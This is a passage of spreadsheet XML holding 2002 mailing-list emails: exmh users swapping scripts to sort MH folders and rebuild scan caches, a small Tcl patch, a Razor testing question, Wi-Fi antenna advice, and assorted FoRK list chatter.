come easier among friends than among\nspouses, Dr. Lerner said, because people have more than one\nfriend and do not need a full range of emotional support\nfrom each one. \n\nBut if the friendship has deteriorated to the point where\none friend truly dislikes the other one or finds that the\nfriendship is causing undue stress, the healthy response is\nto pull away, Dr. Yager said, to stop sharing the personal\nor intimate details of life, and start being too busy to\nget together, ever. \n\n"It takes two people to start and maintain a friendship,\nbut only one to end it," Dr. Yager said. \n\nFriendship, because it is voluntary and unregulated, is far\neasier to dissolve than marriage. But it is also\ncomparatively fragile, experts say. Ideally, the loss of a\nbad friendship should leave a person with more time and\nappreciation for good ones, Dr. Lerner said. \n\n"It is wise to pay attention to your friendships and have\nthem in order while you're healthy and your life and work\nare going well," she said. "Because when a crisis hits,\nwhen someone you love dies, or you lose your job and your\nhealth insurance, when the universe gives you a crash\ncourse in vulnerability, you will discover how crucial and\nlife-preserving good friendship is."\n\n[URL]http://www.nytimes.com[/URL]\n\n\n\nHOW TO ADVERTISE\n---------------------------------\nFor information on advertising in e-mail newsletters \nor other creative advertising opportunities with The \nNew York Times on the Web, please contact\nonlinesales@nytimes.com or visit our online media \nkit at [URL]http://www.nytimes.com[/URL]\n\nFor general information about NYTimes.com, write to \nhelp@nytimes.com.  \n\nCopyright 2002 The New York Times Company</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Brent Welch &lt;welch@panasas.com&gt;\nDate: Tue, 10 Sep 2002 14:31:48 -0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 14:31:48 -0700</t>
  </si>
  <si>
    <t>There is an "Update all scan caches" menu entry that rescans your\nfolders similar to the short scripts folks have shared around.  It\nruns in the background.\n\n&gt;&gt;&gt;Rick Baartman said:\n &gt; &gt; &gt; On Mon, 9 Sep 2002, Rick Baartman wrote:\n &gt; &gt; Thanks Tom and Jacob. The above works, but without the double quotes: \ni.e.\n      \n &gt; &gt; \n &gt; &gt; sh -c 'for f in `folders -recurse -fast` ; do sortm +"$f" ; done'\n &gt; &gt; \n &gt; But there is a problem with making changes outside of exmh: the \n.xmhcache fi\n     les \n &gt; don't get updated. This is dangerous; I have to remember to re-scan each \nfol\n     der \n &gt; I enter. Is there a safeguard for this?\n &gt; \n &gt; --\n &gt; rick\n &gt; \n &gt; \n &gt; \n &gt; \n &gt; _______________________________________________\n &gt; Exmh-users mailing list\n &gt; Exmh-users@redhat.com\n &gt; [URL]https://listman.redhat.com[/URL]\n\n--\nBrent Welch\nSoftware Architect, Panasas Inc\nPioneering the World's Most Scalable and Agile Storage Network\n[URL]www.panasas.com[/URL]\nwelch@panasas.com\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: "David B. Thompson" &lt;thompson@shelob.ce.ttu.edu&gt;\nDate: Tue, 10 Sep 2002 14:16:19 -0500</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 14:16:19 -0500</t>
  </si>
  <si>
    <t>"David B. Thompson" &lt;thompson@shelob.ce.ttu.edu&gt;</t>
  </si>
  <si>
    <t>&gt; &gt; You're probably running exmh on a local machine.  I'm running it on a &gt; &gt; very remote machine.  In this scenario, the mime handling is weak. &gt;  &gt; Nope.  I run exmh on my desktops at home and at work with the resulting &gt; exmh windows being displayed on both my work and home desktops (gratis &gt; SSH X11 forwarding). I run exmh routinely from home (broadband) using an XWindows Client tunneled through ssh under  WinXP.  It works very well in this fashion. FWIW, I use Eudora under Winder$ because it's less of a virus magnet.  :) There's more to the story why I run Winder$, but that's really off-topic and I'm already guilty! -=d _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Tue, 10 Sep 2002 12:52:16 +0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 12:52:16 +0700</t>
  </si>
  <si>
    <t>Patch to complete a change...</t>
  </si>
  <si>
    <t>This is a multipart MIME message.\n\n--==_Exmh_16073047980\nContent-Type: text/plain; charset=us-ascii\n\nI suspect that as part of Chris' set of changes, he cleaned up the\nuse of the variable that was named "L" in FtocCommit (in ftoc.tcl).\nIts name got changed from L to lineno\n\nBut there's one reference of $L left.   That causes tracebacks if\nyou attempt to use "link" with the current CVS version of exmh.\n\nI guess that most of us don't use "link" very often ... I noticed it\nlast week, but only got time to look and see why today.\n\nIf someone with the ability to commit to the CVS repository would\napply the following patch (to lib/ftoc.tcl) that would be nice.\n(It works... and is trivial, and you could perhaps just apply it by\nmaking the change with an editor faster than saving this patch and\napplying it - there's only one instance of $L in the file, that\nshould be changed to $lineno)\n\nkre\n\n\n\n--==_Exmh_16073047980\nContent-Type: text/plain ; name="patch"; charset=us-ascii\nContent-Description: patch\nContent-Disposition: attachment; filename="PATCH"\n\n--- ftoc.tcl.PREV	Wed Aug 21 15:01:48 2002\n+++ ftoc.tcl	Tue Sep 10 12:47:06 2002\n@@ -1131,9 +1131,9 @@\n 		}\n 	    }\n 	    incr ftoc(numMsgs) -1\n 	} else {\n-	    FtocUnmarkInner $L\n+	    FtocUnmarkInner $lineno\n 	}\n 	incr ftoc(changed) -1\n     }\n     if {$delmsgs != {}} {\n\n--==_Exmh_16073047980--\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Tom Reingold &lt;noglider@pobox.com&gt;\nDate: Tue, 10 Sep 2002 11:29:58 -0400</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 11:29:58 -0400</t>
  </si>
  <si>
    <t>Tom Reingold &lt;noglider@pobox.com&gt;</t>
  </si>
  <si>
    <t>On Tue, 10 Sep 2002 15:43:32 BST, 	James Gibbon  wrote: &gt;  &gt; Tom Reingold wrote: &gt; &gt; &gt; Why?  What threat does Outlook pose to your organization? &gt; &gt;  &gt;  &gt; It has been described as "the technological equivalent of &gt; soliciting blood transfusions from random strangers in the &gt; street".  In short - it's a virus magnet. Oh, that.  Well, you're right. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Tom Reingold &lt;noglider@pobox.com&gt;\nDate: Tue, 10 Sep 2002 10:29:26 -0400</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 10:29:26 -0400</t>
  </si>
  <si>
    <t>On Tue, 10 Sep 2002 01:20:56 PDT, 	J C Lawrence  wrote: &gt; On Mon, 09 Sep 2002 15:36:37 -0400  &gt; Tom Reingold  wrote: &gt;  &gt; &gt; At work, I have to use Outlook.  Ick.  I hate it.   &gt;  &gt; Ahh.  At work we fire people who use Outlook (Literally true: They get &gt; escorted to the door, their badge confiscated, and told to return the &gt; next day to collect their office contents). Why?  What threat does Outlook pose to your organization? &gt; &gt; But it does a few things right.  Like making indices for each folder, &gt; &gt; and not just by date, but also by sender, message size, subject.  So I &gt; &gt; can sort by any column instantly. &gt;  &gt; Have you looked into using a custom sequences file? More detail please?  I do use sequences, so I'm familiar with their use, but how can I make indices with them, and how can I keep them up to date? &gt; &gt; And mime handling is pretty bad compared with modern mailers. &gt;  &gt; The only thing I actually miss in that regard is support for S/MIME. You're probably running exmh on a local machine.  I'm running it on a very remote machine.  In this scenario, the mime handling is weak. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Robin Lynn Frank &lt;rlfrank@paradigm-omega.com&gt;\nDate: Tue, 10 Sep 2002 10:18:40 -0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 10:18:40 -0700</t>
  </si>
  <si>
    <t>[Razor-users] How to test razor</t>
  </si>
  <si>
    <t>I have a spamd/spamc/razor/dcc setup.\n\nMy razor logs are full of:\n\nSep 10 09:48:48.411339 check[10200]: [ 1] [bootup] Logging initiated \nLogDebugLevel=3 to file:/home/omega13/.razor/razor-agent.log\nSep 10 09:48:49.391309 check[10200]: [ 3] mail 1 is not known spam.\n\nThe problem is that all the entries show "is not known spam"  I can't believe \nI'm that lucky.  So, how do I test to see that my razor installation is \nworking properly.  I've been up to my ears in documentation for the past few \ndays, so, if the reference is easy, just point me to it.  Otherwise a brief \nhint on how to, would be appreciated.\n-- \nRobin Lynn Frank\nParadigm-Omega, LLC\n==================================\nGandalf fell at Khazadum.\nSheridan fell at Z'ha'dum.\nAvoid high places in \nlocations ending in "dum"\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: J C Lawrence &lt;claw@kanga.nu&gt;\nDate: Tue, 10 Sep 2002 09:27:12 -0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 09:27:12 -0700</t>
  </si>
  <si>
    <t>On Tue, 10 Sep 2002 10:29:26 -0400  Tom Reingold  wrote: &gt; On Tue, 10 Sep 2002 01:20:56 PDT, J C Lawrence  wrote: &gt;&gt; Ahh.  At work we fire people who use Outlook (Literally true: They &gt;&gt; get escorted to the door, their badge confiscated, and told to return &gt;&gt; the next day to collect their office contents). &gt; Why?  What threat does Outlook pose to your organization? It places the company, corporate network and data at risk. Outlook is subject to an (absurdly large) number of exploits with more being regularly found.  An exploited system, to whatever extent, places other corporate systems at risk, customer systems at risk, company reputation and liability with customers at risk, and proprietary/corporate data at risk.  Further, users cannot be reliably expected to use Outlook in a safe manner.  The net result is that Outlook use is considered to be somewhere between criminal negligence and deliberately malicious as far as the employer is concerned. &gt;&gt; Have you looked into using a custom sequences file? &gt; More detail please?  I do use sequences, so I'm familiar with their &gt; use, but how can I make indices with them, and how can I keep them up &gt; to date? I don't use custom sequences, so I can't comment well.  I suspect that you'd have to use a cron job to maintain the sequences. &gt;&gt; The only thing I actually miss in that regard is support for S/MIME. &gt; You're probably running exmh on a local machine.  I'm running it on a &gt; very remote machine.  In this scenario, the mime handling is weak. Nope.  I run exmh on my desktops at home and at work with the resulting exmh windows being displayed on both my work and home desktops (gratis SSH X11 forwarding).  In fact, your message was read and replied to (this message) while at work, using an exmh instance running on my home machine. --  J C Lawrence                 ---------(*)                Satan, oscillate my metallic sonatas.  claw@kanga.nu               He lived as a devil, eh?		   [URL]http://www.kanga.nu[/URL]  Evil is a name of a foeman, as I live. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Robert Waldner &lt;waldner@waldner.priv.at&gt;\nDate: Tue, 10 Sep 2002 09:23:50 +0200</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 09:23:50 +0200</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format.\nIt has been signed conforming to RFC2015.\nYou'll need PGP or GPG to check the signature.\n\n------------=_1031642648-417-32\nContent-Type: text/plain; charset=us-ascii\n\n\nOn Mon, 09 Sep 2002 22:06:58 CDT, Hal DeVore writes:\n&gt;		scan `mhpath +`/$f/.xmhcache\n\nShouldn't that read\n               scan &gt;`mhpath +`/$f/.xmhcache\n ?\n\n(And, JIC something else changed the context in the background, it \n doesn't hurt to explicitly state the folder:\n               scan "+$f" &gt;`mhpath +`/$f/.xmhcache\n )\n\ncheers,\n&amp;rw\n-- \n-- "The problem with the IBM keyboards I have is that when you\n-- use them to beat lusers, the caps come off the keys.\n-- No real damage, but still a nuisance."   -- Martijn Berlage\n\n\n\n------------=_1031642648-417-32\nContent-Type: application/pgp-signature; name="signature.ng"\nContent-Disposition: inline; filename="signature.ng"\nContent-Transfer-Encoding: 7bit\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9fZ4YE0NzSJr53oIRAlxqAJsG8DKAx7bxB6bGzz70VdsAkx6UiQCdG8pJ\ns2JuFuUt7Kaz3xb0JyOx87A=\n=RFA6\n-----END PGP SIGNATURE-----\n\n------------=_1031642648-417-32--\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: "Kevin Oberman" &lt;oberman@es.net&gt;\nDate: Tue, 10 Sep 2002 08:56:47 -0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 08:56:47 -0700</t>
  </si>
  <si>
    <t>"Kevin Oberman" &lt;oberman@es.net&gt;</t>
  </si>
  <si>
    <t>--Multipart_Tue_Sep_10_08:56:11_2002-1 Content-Type: text/plain; charset=US-ASCII &gt; From: Hal DeVore  &gt; Sender: exmh-users-admin@spamassassin.taint.org &gt; Date: Mon, 09 Sep 2002 22:06:58 -0500 &gt;  &gt;  &gt;  &gt; &gt;&gt;&gt;&gt;&gt; On Mon, 9 Sep 2002, "Rick" == Rick Baartman wrote: &gt;  &gt;   Rick&gt; This is dangerous; I have to remember to re-scan each &gt;   Rick&gt; folder I enter. Is there a safeguard for this? &gt;  &gt; Nope.  Regenerate the cache in the script &gt;  &gt; 	for f in `folders -fast -r` &gt; 	do &gt; 		echo sorting $f ... &gt; 		sortm +$f &gt; 		scan `mhpath +`/$f/.xmhcache &gt; 	done &gt;  &gt; --Hal Here is the little script I run I run nightly from cron. It does a general tidying of things including sorting and updating the cache. I didn't write it and I'm afraid I have lost track of who did, but it's worked well for years. I run a similar one to update the glimpse indices nightly. R. Kevin Oberman, Network Engineer Energy Sciences Network (ESnet) Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab) E-mail: oberman@es.net			Phone: +1 510 486-8634 --Multipart_Tue_Sep_10_08:56:11_2002-1 Content-Type: application/octet-stream Content-Disposition: attachment; filename="swasort" Content-Transfer-Encoding: 7bit #!/bin/tcsh -f #  #  Sorts all folders # #  We don't want to sort the drafts folder (and the folders ~/Mail/.glimpse/) # #  default field to sort .: date #  default scan width ....: 100 # set MH_DIR=/usr/local/nmh/bin set MAIL=/home/oberman/Mail # update $MAIL/.folders $MH_DIR/folders -fast -recurse -all &gt; $MAIL/.folders # thru all folders ... foreach i ( `cat $MAIL/.folders | grep -v \.glim | grep -v drafts` )     # sort the stuff     $MH_DIR/mh/sortm +$i -datefield date &gt;&amp; /dev/null     # and update the cache     $MH_DIR/scan +$i -width 100 &gt; $MAIL/$i/.xmhcache end --Multipart_Tue_Sep_10_08:56:11_2002-1-- _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: spamassassin-devel@example.sourceforge.net\nFrom: bugzilla-daemon@hughes-family.org\nDate: Tue, 10 Sep 2002 08:45:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 08:45:08 -0700 (PDT)</t>
  </si>
  <si>
    <t>[SAdev] [Bug 486] SpamAssassin causes zombies (network tests,</t>
  </si>
  <si>
    <t>[URL]http://www.hughes-family.org[/URL]\n\n\n\n\n\n------- Additional Comments From larry@5points.net  2002-09-10 08:45 -------\nDan,\n\nTo answer your question to my post (which maybe should be a seperate bug?) I'm \nusing Spamassassin version 2.30\n\n\n\n------- You are receiving this mail because: -------\nYou are the assignee for the bug, or are watching the assignee.\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http://www.hughes-family.org https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "Gary Lawrence Murphy" &lt;garym@canada.com&gt;,\nFrom: "Geege Schuman" &lt;geege@barrera.org&gt;\nDate: Tue, 10 Sep 2002 07:13:08 -0400</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 07:13:08 -0400</t>
  </si>
  <si>
    <t>you meant "SURPRISINGLY perceptive," didn't you?  :-) recent exceptionally vivid and strange dreams lead me to believe i'm sparking synapses that have lain dormant lo these many years.  Lots of problem solving going on up there at night. -----Original Message----- From: garym@maya.dyndns.org [mailto:garym@maya.dyndns.org]On Behalf Of Gary Lawrence Murphy Sent: Monday, September 09, 2002 11:16 PM To: Geege Schuman Cc: johnhall@evergo.net; FoRK Subject: Re: Recommended Viewing &gt;&gt;&gt;&gt;&gt; "G" == Geege Schuman  writes:     G&gt; ...  i'm sure it's some neurochemical process initiated during     G&gt; the dream that is still cycling thru - like a deja vu,     G&gt; triggered by memory processes, where you don't actually     G&gt; remember but you feel like you're remembering. That's very perceptive of you.  Many people are not so willing to accept their personal reality as skewed by their neuro-physiology.  A great many popular con games exist by exploiting the perceptions of these states. Another oft-exploited neuro-plausibility: The brain is a pretty darn fine analog associative computer, so it could be the neurochemical events during the dream have associated themselves with some inner or external cue to mentally _recreate_ the state-perception like the predictable tone on striking a bell. -- Gary Lawrence Murphy  TeleDynamics Communications Inc  Business Advantage through Community Software : [URL]http://www.teledyn.com[/URL] "Computers are useless.  They can only give you answers."(Pablo Picasso)</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 10 Sep 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-09-10</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * This Week on perl5-porters (2-8 September 2002)\n\n+--------------------------------------------------------------------+\n| This Week on perl5-porters (2-8 September 2002)                    |\n|   posted by rafael on Monday September 09, @07:33 (summaries)      |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nAs September begins, the perl5-porters, ignoring the changing weather,\ncontinue to work. This week, some small things, and a few bigger ones,\nare selected in the report. Read below.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.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yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 10 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-09-10</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nThis Week on perl5-porters (2-8 September 2002)\n    posted by rafael on Monday September 09, @07:33 (summarie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exmh-users@spamassassin.taint.org\nFrom: J C Lawrence &lt;claw@kanga.nu&gt;\nDate: Tue, 10 Sep 2002 01:20:56 -0700</t>
  </si>
  <si>
    <t>Tue, 10 Sep 2002 01:20:56 -0700</t>
  </si>
  <si>
    <t>On Mon, 09 Sep 2002 15:36:37 -0400  Tom Reingold  wrote: &gt; At work, I have to use Outlook.  Ick.  I hate it.   Ahh.  At work we fire people who use Outlook (Literally true: They get escorted to the door, their badge confiscated, and told to return the next day to collect their office contents). &gt; But it does a few things right.  Like making indices for each folder, &gt; and not just by date, but also by sender, message size, subject.  So I &gt; can sort by any column instantly. Have you looked into using a custom sequences file? &gt; And mime handling is pretty bad compared with modern mailers. The only thing I actually miss in that regard is support for S/MIME. --  J C Lawrence                 ---------(*)                Satan, oscillate my metallic sonatas.  claw@kanga.nu               He lived as a devil, eh?		   [URL]http://www.kanga.nu[/URL]  Evil is a name of a foeman, as I live. _______________________________________________ Exmh-users mailing list Exmh-users@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: "'Ian Andrew Bell'" &lt;fork@ianbell.com&gt;,\nFrom: "Damien Morton" &lt;dm-temp-310102@nyc.rr.com&gt;\nDate: Tue, 1 Oct 2002 23:48:02 -0400</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 23:48:02 -0400</t>
  </si>
  <si>
    <t>"Damien Morton" &lt;dm-temp-310102@nyc.rr.com&gt;</t>
  </si>
  <si>
    <t>"'Ian Andrew Bell'" &lt;fork@ianbell.com&gt;,</t>
  </si>
  <si>
    <t>RE: Wifi query</t>
  </si>
  <si>
    <t>That's what the manual said - a diversity antenna.\n\nWhy wouldn't it work well with one omni and one directional antena? \n\nIANAEE, but doesn't that count as diversity?\n\n&gt; -----Original Message-----\n&gt; From: Ian Andrew Bell [mailto:fork@ianbell.com] \n&gt; Sent: Tuesday, 1 October 2002 23:23\n&gt; To: Eugen Leitl\n&gt; Cc: Damien Morton; tomwhore@slack.net; fork@spamassassin.taint.org\n&gt; Subject: Re: Wifi query\n&gt; \n&gt; \n&gt; \n&gt; I think what you're looking at with the dual antenna mounts is a \n&gt; diversity antenna.  It won't work too well with one hooked up to the \n&gt; pringles can and the other hooked up to a regular rubber duck.\n&gt; \n&gt; -Ian.\n&gt; \n&gt; \n&gt; On Tuesday, October 1, 2002, at 01:04 PM, Eugen Leitl wrote:\n&gt; \n&gt; &gt;\n&gt; &gt; 1) reinforced concrete shields like the dickens; wood lots less so\n&gt; &gt; 2) line of sight is best (o'really?)\n&gt; &gt; 3) if you want to boost range, use directional aerials, not omnis\n&gt; &gt;\n&gt; &gt; Direct line of sight (no trees, no nothing) can give you ~10 km with\n&gt; &gt; well\n&gt; &gt; aligned directional aerials (and, say, no sleet, no \n&gt; locusts, nor rain \n&gt; &gt; of\n&gt; &gt; blood). If you want to fan out afterwards, use a bridge of a \n&gt; &gt; directional\n&gt; &gt; coupling to an omni. 802.11a should shield within building \n&gt; lots more \n&gt; &gt; than\n&gt; &gt; 802.11b, ditto line of sight with lots of precipitation inbetween.\n&gt; &gt;\n&gt; &gt; On Tue, 1 Oct 2002, Damien Morton wrote:\n&gt; &gt;\n&gt; &gt;&gt; I just bought a LinkSys BEFW1154v2 Access Point Router for $150 \n&gt; &gt;&gt; ([URL]http://www.linksys.com[/URL] Im \n&gt; &gt;&gt; doing some dev work on a Symbol PocketPC device with built in \n&gt; &gt;&gt; 802.11b.\n&gt; &gt;&gt;\n&gt; &gt;&gt; In this 600 sq ft pre-war New York apartment it goes \n&gt; through 2 or 3 \n&gt; &gt;&gt; walls, into the hallway and halfway down the first flight \n&gt; of stairs \n&gt; &gt;&gt; before it loses contact with the base station. That's less than 50 \n&gt; &gt;&gt; ft. Inside the apartment, it works just fine.\n&gt; &gt;&gt;\n&gt; &gt;&gt; I just did some further testing - through 2 brick walls \n&gt; the range is \n&gt; &gt;&gt; about 25 feet. The signal also goes through the roof pretty much \n&gt; &gt;&gt; unimpeded.\n&gt; &gt;&gt;\n&gt; &gt;&gt; That said, the Symbol device doesn't have an antenna to \n&gt; speak of, and\n&gt; &gt;&gt; I\n&gt; &gt;&gt; havent done any tweaking to try to extend the range.\n&gt; &gt;&gt;\n&gt; &gt;&gt; The Linksys unit has two antenna mounts - you could leave one as an\n&gt; &gt;&gt; omni\n&gt; &gt;&gt; antenna while hooking up a directional antenna to the other.\n&gt; &gt;&gt;\n&gt; &gt;&gt; You might find that you have to use several access points and/or \n&gt; &gt;&gt; repeaters to get the coverage you want.\n&gt;</t>
  </si>
  <si>
    <t>http://www.linksys.com</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;\nDate: Tue, 1 Oct 2002 23:07:59 -0700</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 23:07:59 -0700</t>
  </si>
  <si>
    <t>ActiveBuddy</t>
  </si>
  <si>
    <t>Kind of interesting application of 'agent' technology.\nA mix of telnet and Eliza?\n(wonder if KnowNow needs this as a partner...)\n\n==\n[URL]http://www.activebuddy.com[/URL]\nActiveBuddy, Inc. has developed patented technology for building and\ndeploying interactive agents. ActiveBuddy's BuddyScript technology powers\nbusiness solutions that leverage the functionality, convenience and appeal\nof instant messaging to provide an efficient and immediate means of\ncommunication with customers and constituents.\n\nActiveBuddy technology is proven in the marketplace by the smash success of\nSmarterChild, ActiveBuddy's showcase interactive agent launched in June 2001\nand visited by over 8 million consumers in its first year of life.\n\nInteractive agents allow your customers and constituents to receive\ninformation and services in a natural, conversational interface.\n\n\nSoftware Products\nBuddyScriptT Server - an end-to-end software solution for deploying\ninteractive agents. BuddyScript Server provides every component required to\noperate an interactive agent, including connectivity with the messaging\nnetwork, message routing, data access, message formatting, user and session\nmanagement, and detailed tracking. BuddyScript Server is offered in four\nconfigurations to meet your capacity needs. Its scaleable architecture\nsupports virtually unlimited usage. More...\n\n===\nHere is a sample conversation on (MSN Messenger with 'SmarterChild'):\n\nMike says:\nhow are you?\n\nSmarterChild says:\nGreat thx! You?\n\nMike says:\nFine. What is the weather like in seattle?\n\nSmarterChild says:\nCurrent weather conditions for Seattle, WA:\n\nCurrently: 57 F\nCondition: Few Clouds\nReal Feel: 57 F\nDewpoint: 44\nHumidity: 62 %\nVisibility: 10 mi\nWind: N/0 mph\n\nNext time, just type "weather seattle, wa."\n\nTo get the forecast for Seattle, WA, just type "forecast."</t>
  </si>
  <si>
    <t>http://www.activebuddy.com</t>
  </si>
  <si>
    <t>To: Fork@xent.com\nFrom: bitbitch@magnesium.net\nDate: Tue, 1 Oct 2002 23:05:56 -0400</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 23:05:56 -0400</t>
  </si>
  <si>
    <t>Creative political speech</t>
  </si>
  <si>
    <t>[URL]http://www.quitpalestine.org[/URL] Funny as all hell.  So a group of 25 QUIT (Queers Undermining Israeli Terrorism) marched into the local starbucks in Berkeley (Of course, they pick a safe city like Berkeley, but hey, still funny) and 'settle' driving away straights and other prior inhabitants with supersoakers :) Incredibly creative, in my opinion. Not terribly violent (I mean, how much damage can you -really-  do with a supersoaker?) but definintely a newscatcher. Its nice to see folks are finding some creative means to make a point.  Even if you don't -agree- with it, its a hard sell to say that this  has been done before. --  Best regards,  bitbitch                          mailto:bitbitch@magnesium.net</t>
  </si>
  <si>
    <t>http://www.quitpalestine.org</t>
  </si>
  <si>
    <t>To: Eugen Leitl &lt;eugen@leitl.org&gt;\nFrom: Ian Andrew Bell &lt;fork@ianbell.com&gt;\nDate: Tue, 1 Oct 2002 20:22:36 -0700</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 20:22:36 -0700</t>
  </si>
  <si>
    <t>I think what you're looking at with the dual antenna mounts is a \ndiversity antenna.  It won't work too well with one hooked up to the \npringles can and the other hooked up to a regular rubber duck.\n\n-Ian.\n\n\nOn Tuesday, October 1, 2002, at 01:04 PM, Eugen Leitl wrote:\n\n&gt;\n&gt; 1) reinforced concrete shields like the dickens; wood lots less so\n&gt; 2) line of sight is best (o'really?)\n&gt; 3) if you want to boost range, use directional aerials, not omnis\n&gt;\n&gt; Direct line of sight (no trees, no nothing) can give you ~10 km with \n&gt; well\n&gt; aligned directional aerials (and, say, no sleet, no locusts, nor rain \n&gt; of\n&gt; blood). If you want to fan out afterwards, use a bridge of a \n&gt; directional\n&gt; coupling to an omni. 802.11a should shield within building lots more \n&gt; than\n&gt; 802.11b, ditto line of sight with lots of precipitation inbetween.\n&gt;\n&gt; On Tue, 1 Oct 2002, Damien Morton wrote:\n&gt;\n&gt;&gt; I just bought a LinkSys BEFW1154v2 Access Point Router for $150\n&gt;&gt; ([URL]http://www.linksys.com[/URL] Im \n&gt;&gt; doing\n&gt;&gt; some dev work on a Symbol PocketPC device with built in 802.11b.\n&gt;&gt;\n&gt;&gt; In this 600 sq ft pre-war New York apartment it goes through 2 or 3\n&gt;&gt; walls, into the hallway and halfway down the first flight of stairs\n&gt;&gt; before it loses contact with the base station. That's less than 50 ft.\n&gt;&gt; Inside the apartment, it works just fine.\n&gt;&gt;\n&gt;&gt; I just did some further testing - through 2 brick walls the range is\n&gt;&gt; about 25 feet. The signal also goes through the roof pretty much\n&gt;&gt; unimpeded.\n&gt;&gt;\n&gt;&gt; That said, the Symbol device doesn't have an antenna to speak of, and \n&gt;&gt; I\n&gt;&gt; havent done any tweaking to try to extend the range.\n&gt;&gt;\n&gt;&gt; The Linksys unit has two antenna mounts - you could leave one as an \n&gt;&gt; omni\n&gt;&gt; antenna while hooking up a directional antenna to the other.\n&gt;&gt;\n&gt;&gt; You might find that you have to use several access points and/or\n&gt;&gt; repeaters to get the coverage you want.</t>
  </si>
  <si>
    <t>To: "Mr. FoRK" &lt;fork_list@hotmail.com&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 1 Oct 2002 20:06:38 -0400</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 20:06:38 -0400</t>
  </si>
  <si>
    <t>Re: The Wrong Business</t>
  </si>
  <si>
    <t>At 10:27 PM -0700 on 9/30/02, Mr. FoRK wrote: &gt; I realize now, that after reviewing the past several years of work and &gt; career, I have been in the wrong business. The wrong business. &gt; &gt; This is what I should have been doing. &gt; &gt; [URL]http://www.rathergood.com[/URL] A New Manual has been published: Or, the one I read...   And, of course, the open source versions... [URL]http://users.ev1.net[/URL] [URL]http://sunsite.berkeley.edu[/URL]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www.rathergood.com http://users.ev1.net http://sunsite.berkeley.edu</t>
  </si>
  <si>
    <t>To: zzz-redhat@example.com\nFrom: Red Hat Network &lt;rhn-admin@rhn.redhat.com&gt;\nDate: Tue, 1 Oct 2002 16:02:06 -0400</t>
  </si>
  <si>
    <t>Tue, 1 Oct 2002 16:02:06 -0400</t>
  </si>
  <si>
    <t>Red Hat Network &lt;rhn-admin@rhn.redhat.com&gt;</t>
  </si>
  <si>
    <t>zzz-redhat@example.com</t>
  </si>
  <si>
    <t>Red Hat Linux 8.0 now available on Red Hat Network</t>
